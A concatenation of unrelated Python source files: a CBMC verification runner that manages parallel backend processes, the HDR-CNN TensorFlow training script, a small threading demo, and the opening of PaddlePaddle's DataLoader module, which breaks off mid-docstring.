results = [p.apply_async(feed_sim, (self, cmd, info, timelimit, i, seqfile))
for i in range(simulate)]
done = [r.get() for r in results]
p.close()
pass_count, fail_count = Counter(), Counter()
for result in done:
for prop, success in result.items():
if success:
pass_count[prop] += 1
else:
fail_count[prop] += 1
self.output = "PASS: {}\nFAIL: {}".format(str(pass_count), str(fail_count))
''' Single-process Analysis.
- on finding a counterexample (at the moment detected by exitcode=10) terminates all other processes.
- on crashing (exitcode=6) terminates all other processes.
- on successfully terminating without crashing or counterexamples (exitcode=0) do nothing.
'''
def feed(self,id,cores, cmd,timeout,backend,logfile, pool,code,boh, l,pipe, starttime):
pool[id] = os.getpid() # store this process' pid into the shared array
tids = ','.join(str(x) for x in pool)
codes = ','.join(str(x) for x in code)
subs = ','.join(str(x) for x in boh)
#print("---> [%s] START +%0.2fs pid:[%s] cmd:[%s] pool:[%s] code:[%s] sub:[%s] <---" %(id,time.time()-starttime,os.getpid(),cmd,tids,codes,subs))
print("---> [%s] START +%0.2fs pid:[%s] cmd:[%s] <---" %(id,time.time()-starttime,os.getpid(),cmd))
p = core.utils.CommandPid(cmd)
newpid = p.spawn() # store stdout, stderr, process' return value
boh[id] = newpid # store the identifier for the spawned backend
###########print ("SPAWNED %s" % newpid)
out,err,cod = p.wait(int(timeout))
if cod is None: cod = -2
else: cod = int(cod)
code[id] = cod
####if 'warning' in err: self.warn('warnings on stderr from the backend')
# for CBMC, code=0 means SAFE, code=10 means UNSAFE, code=6 means error.
tids = ','.join(str(x) for x in pool)
codes = ','.join(str(x) for x in code)
subs = ','.join(str(x) for x in boh)
pool[id] = 0
# no error trace found or analysis timeout:
# if this is the last process to terminate,
# save the log;
# if there are still other processes running,
# no action taken.
if code[id] == 0 or code[id] == -9:
s = ''
if code[id] == 0: s = 'PASS'
if code[id] == -9: s = 'SKIP'
#print("---> [%s] %s +%0.2fs pid:[%s] cmd:[%s] pool:[%s] code:[%s] sub:[%s] <---" %(id,s,time.time()-starttime,os.getpid(),cmd,tids,codes,subs))
print("---> [%s] %s +%0.2fs pid:[%s] cmd:[%s] <---" %(id,s,time.time()-starttime,os.getpid(),cmd))
l.acquire()
# is this the only process still running?
lastone = not any(pool[k]!=0 and k!=id for k in xrange(cores))
# last process to terminate, and no error traces found
if lastone and code[id] == 0:
self.setOutputParam('exitcode', code[id])
# dump backend's output to file
######core.utils.saveFile(logfile,out)
pipe.send(out)
pipe.close()
l.release()
# error trace found or error from the backend
if not(code[id] == 0 or code[id] == -9):
print("---> [%s] FAIL +%0.2fs pid:[%s] cmd:[%s] <---" %(id,time.time()-starttime,os.getpid(),cmd))
# stop all other processes immediately
# But only if I am the first (boh[id] != 0)
if not(code[id] == 0 or code[id] == -9) and boh[id] != 0:
l.acquire()
for k in range(0,cores):
if boh[k] != 0:
try: # might have terminated meanwhile
os.kill(boh[k],signal.SIGTERM)
os.kill(boh[k],signal.SIGKILL)
boh[k] = 0
except:
pass
# dump error trace to file
######core.utils.saveFile(logfile,out)
pipe.send(out)
pipe.close()
self.setOutputParam('exitcode', code[id])
if code[id] not in (6,10): self.warn('unknown return value (%s) from the backend' %code[id])
l.release()
def feed_sim(mod, cmd, info, timeout, number, basename):
"""Single-process simulation
"""
place = {
"I": 'c init::1::_I!0@1#1 ',
"Lvalue": 'c init::1::_Lvalue!0@1#1 ',
"E": 'c init::1::_E!0@1#1 '
}
bitwidths = {
"char": 8,
"short": 16,
"int": 32
}
assumes = []
for (typ, pos, offset, value) in info.instrument():
bitw = bitwidths[typ]
startvar = findpropositionalvar(place[pos],mod.lines,offset*bitw).bind(mod)
assumes.extend(
"%i=%s" % x
for x in
zip(range(startvar,startvar+bitw), get_bin(int(value),bitw)[::-1])
)
cmd += " --assume " + ",".join(assumes)
p = core.utils.CommandPid(cmd)
newpid = p.spawn()
out,err,cod = p.wait(int(timeout))
if cod == 0:
# Something's wrong, simulations should always fail
raise "A simulation incorrectly ended without generating a trace"
properties_log = [l for l in out.splitlines() if l.startswith(">>>")]
properties_log = [l.split(" ") for l in properties_log]
properties = {}
for name, result in properties_log:
if name[3:] not in properties:
properties[name[3:]] = (True if "satisfied" in result else False)
else:
# Only update the dictionary if we have a violation
if "violated" in result:
properties[name[3:]] = False
logfile = "{}.{}.log".format(basename, number)
core.utils.saveFile(logfile, out)
return properties
|
hdrcnn_train.py
|
"""
" License:
" -----------------------------------------------------------------------------
" Copyright (c) 2017, Gabriel Eilertsen.
" All rights reserved.
"
" Redistribution and use in source and binary forms, with or without
" modification, are permitted provided that the following conditions are met:
"
" 1. Redistributions of source code must retain the above copyright notice,
" this list of conditions and the following disclaimer.
"
" 2. Redistributions in binary form must reproduce the above copyright notice,
" this list of conditions and the following disclaimer in the documentation
" and/or other materials provided with the distribution.
"
" 3. Neither the name of the copyright holder nor the names of its contributors
" may be used to endorse or promote products derived from this software
" without specific prior written permission.
"
" THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
" ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
" LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
" CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
" SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
" INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
" CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
" ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
" POSSIBILITY OF SUCH DAMAGE.
" -----------------------------------------------------------------------------
"
" Description: Training script for the HDR-CNN
" Author: Gabriel Eilertsen, gabriel.eilertsen@liu.se
" Date: February 2018
"""
import time, math, os, sys, random
import tensorflow as tf
import tensorlayer as tl
import threading
import numpy as np
import scipy.stats as st
sys.path.insert(0, "../")
import network, img_io
eps = 1.0/255.0
#=== Settings =================================================================
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_integer("sx", "320", "Image width")
tf.flags.DEFINE_integer("sy", "320", "Image height")
tf.flags.DEFINE_integer("num_threads", "4", "Number of threads for multi-threaded loading of data")
tf.flags.DEFINE_integer("print_batch_freq", "5000", "Frequency for printing stats and saving images/parameters")
tf.flags.DEFINE_integer("print_batches", "5", "Number of batches to output images for at each [print_batch_freq] step")
tf.flags.DEFINE_bool("print_im", "true", "If LDR sample images should be printed at each [print_batch_freq] step")
tf.flags.DEFINE_bool("print_hdr", "false", "If HDR reconstructions should be printed at each [print_batch_freq] step")
# Paths
tf.flags.DEFINE_string("raw_dir", "input_data", "Path to unprocessed dataset")
tf.flags.DEFINE_string("data_dir", "training_data", "Path to processed dataset. This data will be created if the flag [preprocess] is set")
tf.flags.DEFINE_string("output_dir", "training_output", "Path to output directory, for weights and intermediate results")
tf.flags.DEFINE_string("vgg_path", "weights/vgg16_places365_weights.npy", "Path to VGG16 pre-trained weigths, for encoder convolution layers")
tf.flags.DEFINE_string("parameters", "weights/model_trained.npz", "Path to trained params for complete network")
tf.flags.DEFINE_bool("load_params", "false", "Load the parameters from the [parameters] path, otherwise the parameters from [vgg_path] will be used")
# Data augmentation parameters
tf.flags.DEFINE_bool("preprocess", "false", "Pre-process HDR input data, to create augmented dataset for training")
tf.flags.DEFINE_integer("sub_im", "10", "Number of subimages to pick in a 1 MP pixel image")
tf.flags.DEFINE_integer("sub_im_linearize", "0", "Linearize input images")
tf.flags.DEFINE_float("sub_im_sc1", "0.2", "Min size of crop, in fraction of input image")
tf.flags.DEFINE_float("sub_im_sc2", "0.6", "Max size of crop, in fraction of input image")
tf.flags.DEFINE_float("sub_im_clip1", "0.85", "Min saturation limit, i.e. min fraction of non-saturated pixels")
tf.flags.DEFINE_float("sub_im_clip2", "0.95", "Max saturation limit, i.e. max fraction of non-saturated pixels")
tf.flags.DEFINE_float("sub_im_noise1", "0.0", "Min noise std")
tf.flags.DEFINE_float("sub_im_noise2", "0.01", "Max noise std")
tf.flags.DEFINE_float("sub_im_hue_mean", "0.0", "Mean hue")
tf.flags.DEFINE_float("sub_im_hue_std", "7.0", "Std of hue")
tf.flags.DEFINE_float("sub_im_sat_mean", "0.0", "Mean saturation")
tf.flags.DEFINE_float("sub_im_sat_std", "0.1", "Std of saturation")
tf.flags.DEFINE_float("sub_im_sigmn_mean", "0.9", "Mean sigmoid exponent")
tf.flags.DEFINE_float("sub_im_sigmn_std", "0.1", "Std of sigmoid exponent")
tf.flags.DEFINE_float("sub_im_sigma_mean", "0.6", "Mean sigmoid offset")
tf.flags.DEFINE_float("sub_im_sigma_std", "0.1", "Std of sigmoid offset")
tf.flags.DEFINE_integer("sub_im_min_jpg", "30", "Minimum quality level of generated LDR images")
# Learning parameters
tf.flags.DEFINE_float("num_epochs", "100.0", "Number of training epochs")
tf.flags.DEFINE_float("start_step", "0.0", "Step to start from")
tf.flags.DEFINE_float("learning_rate", "0.00005", "Starting learning rate for Adam optimizer")
tf.flags.DEFINE_integer("batch_size", "4", "Batch size for training")
tf.flags.DEFINE_bool("sep_loss", "true", "Use illumination + reflectance loss")
tf.flags.DEFINE_float("lambda_ir", "0.5", "Reflectance weight for the ill+refl loss")
tf.flags.DEFINE_bool("rand_data", "true", "Random shuffling of training data")
tf.flags.DEFINE_float("train_size", "0.99", "Fraction of data to use for training, the rest is validation data")
tf.flags.DEFINE_integer("buffer_size", "256", "Size of load queue when reading training data")
#==============================================================================
sx = FLAGS.sx
sy = FLAGS.sy
data_dir_bin = os.path.join(FLAGS.data_dir, "bin")
data_dir_jpg = os.path.join(FLAGS.data_dir, "jpg")
log_dir = os.path.join(FLAGS.output_dir, "logs")
im_dir = os.path.join(FLAGS.output_dir, "im")
#=== Pre-processing/data augmentation =========================================
# Process training data
if (FLAGS.preprocess):
cmd = "./virtualcamera/virtualcamera -linearize %d -imsize %d %d 3 -input_path %s -output_path %s \
-subimages %d -cropscale %f %f -clip %f %f -noise %f %f \
-hue %f %f -sat %f %f -sigmoid_n %f %f -sigmoid_a %f %f \
-jpeg_quality %d" % \
(FLAGS.sub_im_linearize, sy, sx, FLAGS.raw_dir, FLAGS.data_dir, FLAGS.sub_im,
FLAGS.sub_im_sc1, FLAGS.sub_im_sc2,
FLAGS.sub_im_clip1, FLAGS.sub_im_clip2,
FLAGS.sub_im_noise1, FLAGS.sub_im_noise2,
FLAGS.sub_im_hue_mean, FLAGS.sub_im_hue_std,
FLAGS.sub_im_sat_mean, FLAGS.sub_im_sat_std,
FLAGS.sub_im_sigmn_mean, FLAGS.sub_im_sigmn_std,
FLAGS.sub_im_sigma_mean, FLAGS.sub_im_sigma_std,
FLAGS.sub_im_min_jpg);
print("\nRunning processing of training data")
print("cmd = '%s'\n\n"%cmd)
# Remove old data, and run new data generation
os.system("rm -rf %s"%FLAGS.data_dir)
os.makedirs(data_dir_bin)
os.makedirs(data_dir_jpg)
os.system(cmd)
print("\n")
# Create output directories
tl.files.exists_or_mkdir(log_dir)
tl.files.exists_or_mkdir(im_dir)
#=== Localize training data ===================================================
# Get names of all images in the training path
frames = [name for name in sorted(os.listdir(data_dir_bin)) if os.path.isfile(os.path.join(data_dir_bin, name))]
# Randomize the images
if FLAGS.rand_data:
random.shuffle(frames)
# Split data into training/validation sets
splitPos = len(frames) - math.floor(max(FLAGS.batch_size, min((1-FLAGS.train_size)*len(frames), 1000)))
frames_train, frames_valid = np.split(frames, [splitPos])
# Number of steps per epoch depends on the number of training images
training_samples = len(frames_train)
validation_samples = len(frames_valid)
steps_per_epoch = training_samples/FLAGS.batch_size
print("\n\nData to be used:")
print("\t%d training images" % training_samples)
print("\t%d validation images\n" % validation_samples)
#=== Load validation data =====================================================
# Load all validation images into memory
print("Loading validation data...")
x_valid, y_valid = [], []
for i in range(len(frames_valid)):
if i % 10 == 0:
print("\tframe %d of %d" % (i, len(frames_valid)))
succ, xv, yv = img_io.load_training_pair(os.path.join(data_dir_bin, frames_valid[i]), os.path.join(data_dir_jpg, frames_valid[i].replace(".bin", ".jpg")))
if not succ:
continue
xv = xv[np.newaxis,:,:,:]
yv = yv[np.newaxis,:,:,:]
if i == 0:
x_valid, y_valid = xv, yv
else:
x_valid = np.concatenate((x_valid, xv), axis=0)
y_valid = np.concatenate((y_valid, yv), axis=0)
print("...done!\n\n")
del frames
#=== Setup data queues ========================================================
# For single-threaded queueing of frame names
input_frame = tf.placeholder(tf.string)
q_frames = tf.FIFOQueue(FLAGS.buffer_size, [tf.string])
enqueue_op_frames = q_frames.enqueue([input_frame])
dequeue_op_frames = q_frames.dequeue()
# For multi-threaded queueing of training images
input_data = tf.placeholder(tf.float32, shape=[sy, sx, 3])
input_target = tf.placeholder(tf.float32, shape=[sy, sx, 3])
q_train = tf.FIFOQueue(FLAGS.buffer_size, [tf.float32, tf.float32], shapes=[[sy,sx,3], [sy,sx,3]])
enqueue_op_train = q_train.enqueue([input_target, input_data])
y_, x = q_train.dequeue_many(FLAGS.batch_size)
#=== Network ==================================================================
# Setup the network
print("Network setup:\n")
net, vgg16_conv_layers = network.model(x, FLAGS.batch_size, True)
y = net.outputs
train_params = net.all_params
# The TensorFlow session to be used
sess = tf.InteractiveSession()
#=== Loss function formulation ================================================
# For masked loss, only using information near saturated image regions
thr = 0.05 # Threshold for blending
msk = tf.reduce_max(y_, reduction_indices=[3])
msk = tf.minimum(1.0, tf.maximum(0.0, msk-1.0+thr)/thr)
msk = tf.reshape(msk, [-1, sy, sx, 1])
msk = tf.tile(msk, [1,1,1,3])
# Loss separated into illumination and reflectance terms
if FLAGS.sep_loss:
y_log_ = tf.log(y_+eps)
x_log = tf.log(tf.pow(x, 2.0)+eps)
# Luminance
lum_kernel = np.zeros((1, 1, 3, 1))
lum_kernel[:, :, 0, 0] = 0.213
lum_kernel[:, :, 1, 0] = 0.715
lum_kernel[:, :, 2, 0] = 0.072
y_lum_lin_ = tf.nn.conv2d(y_, lum_kernel, [1, 1, 1, 1], padding='SAME')
y_lum_lin = tf.nn.conv2d(tf.exp(y)-eps, lum_kernel, [1, 1, 1, 1], padding='SAME')
x_lum_lin = tf.nn.conv2d(x, lum_kernel, [1, 1, 1, 1], padding='SAME')
# Log luminance
y_lum_ = tf.log(y_lum_lin_ + eps)
y_lum = tf.log(y_lum_lin + eps)
x_lum = tf.log(x_lum_lin + eps)
# Gaussian kernel
nsig = 2
filter_size = 13
interval = (2*nsig+1.)/(filter_size)
ll = np.linspace(-nsig-interval/2., nsig+interval/2., filter_size+1)
kern1d = np.diff(st.norm.cdf(ll))
kernel_raw = np.sqrt(np.outer(kern1d, kern1d))
kernel = kernel_raw/kernel_raw.sum()
# Illumination, approximated by means of Gaussian filtering
weights_g = np.zeros((filter_size, filter_size, 1, 1))
weights_g[:, :, 0, 0] = kernel
y_ill_ = tf.nn.conv2d(y_lum_, weights_g, [1, 1, 1, 1], padding='SAME')
y_ill = tf.nn.conv2d(y_lum, weights_g, [1, 1, 1, 1], padding='SAME')
x_ill = tf.nn.conv2d(x_lum, weights_g, [1, 1, 1, 1], padding='SAME')
# Reflectance
y_refl_ = y_log_ - tf.tile(y_ill_, [1,1,1,3])
y_refl = y - tf.tile(y_ill, [1,1,1,3])
x_refl = x - tf.tile(x_ill, [1,1,1,3])
cost = tf.reduce_mean( ( FLAGS.lambda_ir*tf.square( tf.subtract(y_ill, y_ill_) ) + (1.0-FLAGS.lambda_ir)*tf.square( tf.subtract(y_refl, y_refl_) ) )*msk )
cost_input_output = tf.reduce_mean( ( FLAGS.lambda_ir*tf.square( tf.subtract(x_ill, y_ill_) ) + (1.0-FLAGS.lambda_ir)*tf.square( tf.subtract(x_refl, y_refl_) ) )*msk )
else:
cost = tf.reduce_mean( tf.square( tf.subtract(y, tf.log(y_+eps) )*msk ) )
cost_input_output = tf.reduce_mean( tf.square( tf.subtract(tf.log(y_+eps), tf.log(tf.pow(x, 2.0)+eps) )*msk ) );
# Optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = FLAGS.learning_rate
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
int(steps_per_epoch), 0.99, staircase=True)
train_op = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999,
epsilon=1e-8, use_locking=False).minimize(cost, global_step=global_step, var_list = train_params)
#=== Data enqueueing functions ================================================
# For enqueueing of frame names
def enqueue_frames(enqueue_op, coord, frames):
num_frames = len(frames)
i, k = 0, 0
try:
while not coord.should_stop():
if k >= training_samples*FLAGS.num_epochs:
sess.run(q_frames.close())
break
if i == num_frames:
i = 0
if FLAGS.rand_data:
random.shuffle(frames)
fname = frames[i];
i += 1
k += 1
sess.run(enqueue_op, feed_dict={input_frame: fname})
except tf.errors.OutOfRangeError:
pass
except Exception as e:
coord.request_stop(e)
# For multi-threaded reading and enqueueing of frames
def load_and_enqueue(enqueue_op, coord):
try:
while not coord.should_stop():
fname = sess.run(dequeue_op_frames).decode("utf-8")
# Load pairs of HDR/LDR images
succ, input_data_r, input_target_r = img_io.load_training_pair(os.path.join(data_dir_bin, fname), os.path.join(data_dir_jpg, fname.replace(".bin", ".jpg")))
if not succ:
continue
sess.run(enqueue_op, feed_dict={input_data: input_data_r, input_target: input_target_r})
except Exception as e:
try:
sess.run(q_train.close())
except Exception as e:
pass
#=== Error and output function ================================================
# For calculation of loss and output of intermediate validations images to disc
def calc_loss_and_print(x_data, y_data, print_dir, step, N):
val_loss, orig_loss, n_batch = 0, 0, 0
for b in range(int(x_data.shape[0]/FLAGS.batch_size)):
x_batch = x_data[b*FLAGS.batch_size:(b+1)*FLAGS.batch_size,:,:,:]
y_batch = y_data[b*FLAGS.batch_size:(b+1)*FLAGS.batch_size,:,:,:]
feed_dict = {x: x_batch, y_: y_batch}
err1, err2, y_predict, y_gt, M = sess.run([cost, cost_input_output, y, y_, msk], feed_dict=feed_dict)
val_loss += err1; orig_loss += err2; n_batch += 1
batch_dir = print_dir
if x_data.shape[0] > x_batch.shape[0]:
batch_dir = '%s/batch_%03d' % (print_dir, n_batch)
if n_batch <= N or N < 0:
if not os.path.exists(batch_dir):
os.makedirs(batch_dir)
for i in range(0, x_batch.shape[0]):
yy_p = np.squeeze(y_predict[i])
xx = np.squeeze(x_batch[i])
yy = np.squeeze(y_gt[i])
mm = np.squeeze(M[i])
# Apply inverse camera curve
x_lin = np.power(np.divide(0.6*xx, np.maximum(1.6-xx, 1e-10) ), 1.0/0.9)
# Transform log predictions to linear domain
yy_p = np.exp(yy_p)-eps
# Masking
y_final = (1-mm)*x_lin + mm*yy_p
# Gamma correction
yy_p = np.power(np.maximum(yy_p, 0.0), 0.5)
y_final = np.power(np.maximum(y_final, 0.0), 0.5)
yy = np.power(np.maximum(yy, 0.0), 0.5)
xx = np.power(np.maximum(x_lin, 0.0), 0.5)
# Print LDR samples
if FLAGS.print_im:
img_io.writeLDR(xx, "%s/%06d_%03d_in.png" % (batch_dir, step, i+1), -3)
img_io.writeLDR(yy, "%s/%06d_%03d_gt.png" % (batch_dir, step, i+1), -3)
img_io.writeLDR(y_final, "%s/%06d_%03d_out.png" % (batch_dir, step, i+1), -3)
# Print HDR samples
if FLAGS.print_hdr:
img_io.writeEXR(xx, "%s/%06d_%03d_in.exr" % (batch_dir, step, i+1))
img_io.writeEXR(yy, "%s/%06d_%03d_gt.exr" % (batch_dir, step, i+1))
img_io.writeEXR(y_final, "%s/%06d_%03d_out.exr" % (batch_dir, step, i+1))
return (val_loss/n_batch, orig_loss/n_batch)
#=== Setup threads and load parameters ========================================
# Summary for Tensorboard
tf.summary.scalar("learning_rate", learning_rate)
summaries = tf.summary.merge_all()
file_writer = tf.summary.FileWriter(log_dir, sess.graph)
sess.run(tf.global_variables_initializer())
# Threads and thread coordinator
coord = tf.train.Coordinator()
thread1 = threading.Thread(target=enqueue_frames, args=[enqueue_op_frames, coord, frames_train])
thread2 = [threading.Thread(target=load_and_enqueue, args=[enqueue_op_train, coord]) for i in range(FLAGS.num_threads)]
thread1.start()
for t in thread2:
t.start()
threads = tf.train.start_queue_runners(coord=coord, sess=sess)
# Loading model weights
if(FLAGS.load_params):
# Load model weights
print("\n\nLoading trained parameters from '%s'..." % FLAGS.parameters)
load_params = tl.files.load_npz(name=FLAGS.parameters)
tl.files.assign_params(sess, load_params, net)
print("...done!\n")
else:
# Load pretrained VGG16 weights for encoder
print("\n\nLoading parameters for VGG16 convolutional layers, from '%s'..." % FLAGS.vgg_path)
network.load_vgg_weights(vgg16_conv_layers, FLAGS.vgg_path, sess)
print("...done!\n")
#=== Run training loop ========================================================
print("\nStarting training...\n")
step = FLAGS.start_step
train_loss = 0.0
start_time = time.time()
start_time_tot = time.time()
# The training loop
try:
while not coord.should_stop():
step += 1
_, err_t = sess.run([train_op,cost])
train_loss += err_t
# Statistics on intermediate progress
v = int(max(1.0,FLAGS.print_batch_freq/5.0))
if (int(step) % v) == 0:
val_loss, n_batch = 0, 0
# Validation loss
for b in range(int(x_valid.shape[0]/FLAGS.batch_size)):
x_batch = x_valid[b*FLAGS.batch_size:(b+1)*FLAGS.batch_size,:,:,:]
y_batch = y_valid[b*FLAGS.batch_size:(b+1)*FLAGS.batch_size,:,:,:]
feed_dict = {x: x_batch, y_: y_batch}
err = sess.run(cost, feed_dict=feed_dict)
val_loss += err; n_batch += 1
# Training and validation loss for Tensorboard
train_summary = tf.Summary()
valid_summary = tf.Summary()
valid_summary.value.add(tag='validation_loss',simple_value=val_loss/n_batch)
file_writer.add_summary(valid_summary, step)
train_summary.value.add(tag='training_loss',simple_value=train_loss/v)
file_writer.add_summary(train_summary, step)
# Other statistics for Tensorboard
summary = sess.run(summaries)
file_writer.add_summary(summary, step)
file_writer.flush()
# Intermediate training statistics
print(' [Step %06d of %06d. Processed %06d of %06d samples. Train loss = %0.6f, valid loss = %0.6f]' % (step, steps_per_epoch*FLAGS.num_epochs, (step % steps_per_epoch)*FLAGS.batch_size, training_samples, train_loss/v, val_loss/n_batch))
train_loss = 0.0
# Print statistics, and save weights and some validation images
if step % FLAGS.print_batch_freq == 0:
duration = time.time() - start_time
duration_tot = time.time() - start_time_tot
print_dir = '%s/step_%06d' % (im_dir, step)
val_loss, orig_loss = calc_loss_and_print(x_valid, y_valid, print_dir, step, FLAGS.print_batches)
# Training statistics
print('\n')
print('-------------------------------------------')
print('Currently at epoch %0.2f of %d.' % (step/steps_per_epoch, FLAGS.num_epochs))
print('Valid loss input = %.5f' % (orig_loss))
print('Valid loss trained = %.5f' % (val_loss))
print('Timings:')
print(' Since last: %.3f sec' % (duration))
print(' Per step: %.3f sec' % (duration/FLAGS.print_batch_freq))
print(' Per epoch: %.3f sec' % (duration*steps_per_epoch/FLAGS.print_batch_freq))
print('')
print(' Per step (avg): %.3f sec' % (duration_tot/step))
print(' Per epoch (avg): %.3f sec' % (duration_tot*steps_per_epoch/step))
print('')
print(' Total time: %.3f sec' % (duration_tot))
print(' Exp. time left: %.3f sec' % (duration_tot*steps_per_epoch*FLAGS.num_epochs/step - duration_tot))
print('-------------------------------------------')
# Save current weights
tl.files.save_npz(net.all_params , name=("%s/model_step_%06d.npz"%(log_dir,step)))
print('\n')
start_time = time.time()
except tf.errors.OutOfRangeError:
print('Done!')
except Exception as e:
print("ERROR: ", e)
#=== Final stats and weights ==================================================
duration = time.time() - start_time
duration_tot = time.time() - start_time_tot
print_dir = '%s/step_%06d' % (im_dir, step)
val_loss, orig_loss = calc_loss_and_print(x_valid, y_valid, print_dir, step, FLAGS.print_batches)
# Final statistics
print('\n')
print('-------------------------------------------')
print('Finished at epoch %0.2f of %d.' % (step/steps_per_epoch, FLAGS.num_epochs))
print('Valid loss input = %.5f' % (orig_loss))
print('Valid loss trained = %.5f' % (val_loss))
print('Timings:')
print(' Per step (avg): %.3f sec' % (duration_tot/step))
print(' Per epoch (avg): %.3f sec' % (duration_tot*steps_per_epoch/step))
print('')
print(' Total time: %.3f sec' % (duration_tot))
print('-------------------------------------------')
# Save final weights
tl.files.save_npz(net.all_params , name=("%s/model_step_%06d.npz"%(log_dir,step)))
print('\n')
#=== Shut down ================================================================
# Stop threads
print("Shutting down threads...")
try:
coord.request_stop()
except Exception as e:
print("ERROR: ", e)
# Wait for threads to finish
print("Waiting for threads...")
coord.join(threads)
file_writer.close()
sess.close()
|
threading1.py
|
import threading
import time
def func():
print("ran\n")
time.sleep(1)
print('done')
time.sleep(1)
print('Done Sleeping..')
x = threading.Thread(target=func)
x.start()
print(threading.active_count())
time.sleep(1.2)
print("Finally")
print(threading.active_count())
|
reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place, _in_eager_mode
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
from .framework import _get_paddle_place, _get_paddle_place_list
from paddle.fluid.framework import _set_expected_place, _current_expected_place
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
import queue
# NOTE: [ avoid hanging & failed quickly ] These value is used in getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
class DataLoader(object):
"""
DataLoader prodives an iterator which iterates given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-prcess data loading,
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader supports map-style dataset and iterable-style dataset.
For map-style datast(can get a sample from dataset with a given
index), please see :code:`paddle.io.Dataset`.
For iterable-style datast(get samples from dataset iteratively,
like a Python iterator), please see :code:`paddle.io.IterableDataset`.
For :code:`batch_sampler` please see :code:`paddle.io.BatchSampler`
.. note::
GPU tensor operation is not supported in subprocess currently,
please don't use GPU tensor operations in pipeline which will
be performed in subprocess, such as dataset transforms, collte_fn,
etc. Numpy array and CPU tensor operation is supported.
**Disable automatic batching**
In certain cases such as some NLP tasks, instead of automatic batching,
handling batching manually in dataset is needed by users. For these
cases, automatic batching is disabled if both :attr:`batch_size` and
:attr:`batch_sampler` is set as None, each data got from :attr:`dataset`
should be batched data and will be processed with function define by
:attr:`collate_fn` or :attr:`default_collate_fn`.
.. note::
When automatic batching is disabled, :attr:`default_collate_fn` will
do nothing to data from dataset.
Args:
dataset(Dataset): the dataset to load data from, should be an
